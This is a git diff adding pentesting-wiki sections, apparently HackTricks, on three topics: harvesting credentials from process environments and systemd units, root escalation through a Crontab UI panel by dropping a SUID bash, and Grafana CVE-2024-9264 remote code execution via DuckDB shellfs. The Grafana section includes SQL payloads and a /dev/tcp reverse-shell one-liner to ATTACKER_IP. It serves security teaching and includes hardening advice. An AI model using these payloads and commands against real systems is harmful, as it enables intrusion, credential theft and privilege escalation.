diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index cd3594a78..02ca7d343 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -77,8 +77,54 @@ gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg If the secret key material is present in `private-keys-v1.d`, GPG will unlock and decrypt without prompting for a passphrase (or it will prompt if the key is protected). +## Harvesting credentials from process environment (containers included) + +When you gain code execution inside a service, the process often inherits sensitive environment variables. These are a gold mine for lateral movement. + +Quick wins +- Dump your current process env: `env` or `printenv` +- Dump another process env: `tr '\0' '\n' /environ | sed -n '1,200p'` + - Add `strings -z /proc//environ` if `tr`/`sed` aren’t handy +- In containers, also check PID 1: `tr '\0' '\n' /dev/null | sed 's/\x00/\n/g' +# Example of a root-run web panel +# [Service] +# Environment="BASIC_AUTH_USER=root" +# Environment="BASIC_AUTH_PWD=" +# ExecStart=/usr/bin/crontab-ui +# User=root +``` + +Operational artifacts often leak passwords (e.g., backup scripts that call `zip -P `). Those values are frequently reused in internal web UIs (Basic-Auth) or other services. + +Hardening +- Move secrets to dedicated secret stores (`systemd-ask-password`, `EnvironmentFile` with locked perms, or external secret managers) +- Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control +- Rotate leaked passwords discovered during tests + + ## References +- [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html) +- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui) - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 514e4d10b..72217d607 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -376,6 +376,39 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... ## Scheduled/Cron jobs +### Crontab UI (alseambusher) running as root – web-based scheduler privesc + +If a web “Crontab UI” panel (alseambusher/crontab-ui) runs as root and is only bound to loopback, you can still reach it via SSH local port-forwarding and create a privileged job to escalate. + +Typical chain +- Discover loopback-only port (e.g., 127.0.0.1:8000) and Basic-Auth realm via `ss -ntlp` / `curl -v localhost:8000` +- Find credentials in operational artifacts: + - Backups/scripts with `zip -P ` + - systemd unit exposing `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."` +- Tunnel and login: +```bash +ssh -L 9001:localhost:8000 user@target +# browse http://localhost:9001 and authenticate +``` +- Create a high-priv job and run immediately (drops SUID shell): +```bash +# Name: escalate +# Command: +cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell +``` +- Use it: +```bash +/tmp/rootshell -p # root shell +``` + +Hardening +- Do not run Crontab UI as root; constrain with a dedicated user and minimal permissions +- Bind to localhost and additionally restrict access via firewall/VPN; do not reuse passwords +- Avoid embedding secrets in unit files; use secret stores or root-only EnvironmentFile +- Enable audit/logging for on-demand job executions + + + Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?). ```bash @@ -1716,6 +1749,10 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md ## References +- [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html) +- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui) + + - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) - [https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744) diff --git a/src/network-services-pentesting/pentesting-web/grafana.md b/src/network-services-pentesting/pentesting-web/grafana.md index 7fe30b7bb..da48211b9 100644 --- a/src/network-services-pentesting/pentesting-web/grafana.md +++ b/src/network-services-pentesting/pentesting-web/grafana.md @@ -10,7 +10,66 @@ - By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`** - `select user,password,database from data_source;` +--- + +## CVE-2024-9264 – SQL Expressions (DuckDB shellfs) post-auth RCE / LFI + +Grafana’s experimental SQL Expressions feature can evaluate DuckDB queries that embed user-controlled text. Insufficient sanitization allows attackers to chain DuckDB statements and load the community extension shellfs, which exposes shell commands via pipe-backed virtual files. + +Impact +- Any authenticated user with VIEWER or higher can get code execution as the Grafana OS user (often grafana; sometimes root inside a container) or perform local file reads. +- Preconditions commonly met in real deployments: + - SQL Expressions enabled: `expressions.enabled = true` + - `duckdb` binary present in PATH on the server + +Quick checks +- In the UI/API, browse Admin settings (Swagger: `/swagger-ui`, endpoint `/api/admin/settings`) to confirm: + - `expressions.enabled` is true + - Optional: version (e.g., v11.0.0 vulnerable), datasource types, etc. +- Shell on host: `which duckdb` must resolve for the exploit path below. + +Manual query pattern using DuckDB + shellfs +- Abuse flow (2 queries): + 1) Install and load the shellfs extension, run a command, redirect combined output to a temp file via pipe + 2) Read back the temp file using `read_blob` + +Example SQL Expressions payloads that get passed to DuckDB: +```sql +-- 1) Prepare shellfs and run command +SELECT 1; INSTALL shellfs FROM community; LOAD shellfs; +SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |'); +-- 2) Read the output back +SELECT content FROM read_blob('/tmp/grafana_cmd_output'); +``` +Replace CMD with your desired command. For file-read (LFI) you can instead use DuckDB file functions to read local files. + +One-liner reverse shell example +```bash +bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1" +``` +Embed that as CMD in the first query while you have a listener: `nc -lnvp 443`. + +Automated PoC +- Public PoC (built on cfreal’s ten framework): + - [https://github.com/nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264) + +Usage example +```bash +# Confirm execution context and UID +python3 CVE-2024-9264.py -u -p -c id http://grafana.target +# Launch a reverse shell +python3 CVE-2024-9264.py -u -p \ + -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \ + http://grafana.target +``` +If output shows `uid=0(root)`, Grafana is running as root (common inside some containers). + + +## References + +- [Grafana Advisory – CVE-2024-9264 (SQL Expressions RCE/LFI)](https://grafana.com/security/security-advisories/cve-2024-9264/) +- [DuckDB shellfs community extension](https://duckdb.org/community_extensions/extensions/shellfs.html) +- [nollium/CVE-2024-9264 PoC](https://github.com/nollium/CVE-2024-9264) +- [cfreal/ten framework](https://github.com/cfreal/ten) + {{#include ../../banners/hacktricks-training.md}} - - -